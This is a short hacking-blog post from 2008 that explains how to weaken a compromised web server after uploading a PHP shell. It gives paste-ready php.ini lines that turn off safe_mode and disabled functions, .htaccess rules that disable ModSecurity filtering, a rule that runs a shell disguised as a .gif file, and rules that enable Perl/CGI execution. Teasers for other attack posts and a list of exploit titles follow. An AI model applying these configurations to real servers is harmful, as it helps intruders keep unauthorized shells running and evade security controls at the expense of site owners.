Bypassing Shell Security

Home / Hacking, News, Security / Bypassing Shell Security

October 28, 2008 PlanetCreator 0 Comments 0 tags

Safemode = On (Secure)
Disables Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File “Php.ini” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
———————
Paste This
———————
safe_mode = OFF
disable_functions = NONE
———————

================
ModSecurity = On
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
————————
Paste This
————————
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
————————

================
Hiding Your Shell
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
But Change File Extension To .gif (You Can Use Any Other extension But Change .gif In .htaccess To Extension You Chose) Then Open Your Shell From There
————————
Paste This
————————
AddType application/x-httpd-php .gif
————————

================
Activate Perl And CGI
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
————————
Paste This
————————
Options ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
————————

Explore More

SpoofTooph 0.4 Release

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will

Javascript Injection

JavaScript Injection Overview JavaScript is a widely used technology within websites and web based applications. JavaScript can be used for all sorts of useful things and functions. But along with

critical XSS vulnerability on Accounts Chamber of the Russian Federation http://www.ach.gov.ru

PlanetCreator.Netâ€™s Security Team Member has reported another critical XSS vulnerability on Accounts Chamber of the Russian Federation http://www.ach.gov.ru These are some information from Vulneral Site http://www.ach.gov.ru: This vulnerability has been

[webapps] FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
on December 25, 2025 at 12:00 am
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
[webapps] Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
on December 25, 2025 at 12:00 am
Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
[webapps] WordPress Quiz Maker 6.7.0.56 - SQL Injection
on December 25, 2025 at 12:00 am
WordPress Quiz Maker 6.7.0.56 - SQL Injection
[webapps] esm-dev 136 - Path Traversal
on December 16, 2025 at 12:00 am
esm-dev 136 - Path Traversal
[webapps] Summar Employee Portal 3.98.0 - Authenticated SQL Injection
on December 16, 2025 at 12:00 am
Summar Employee Portal 3.98.0 - Authenticated SQL Injection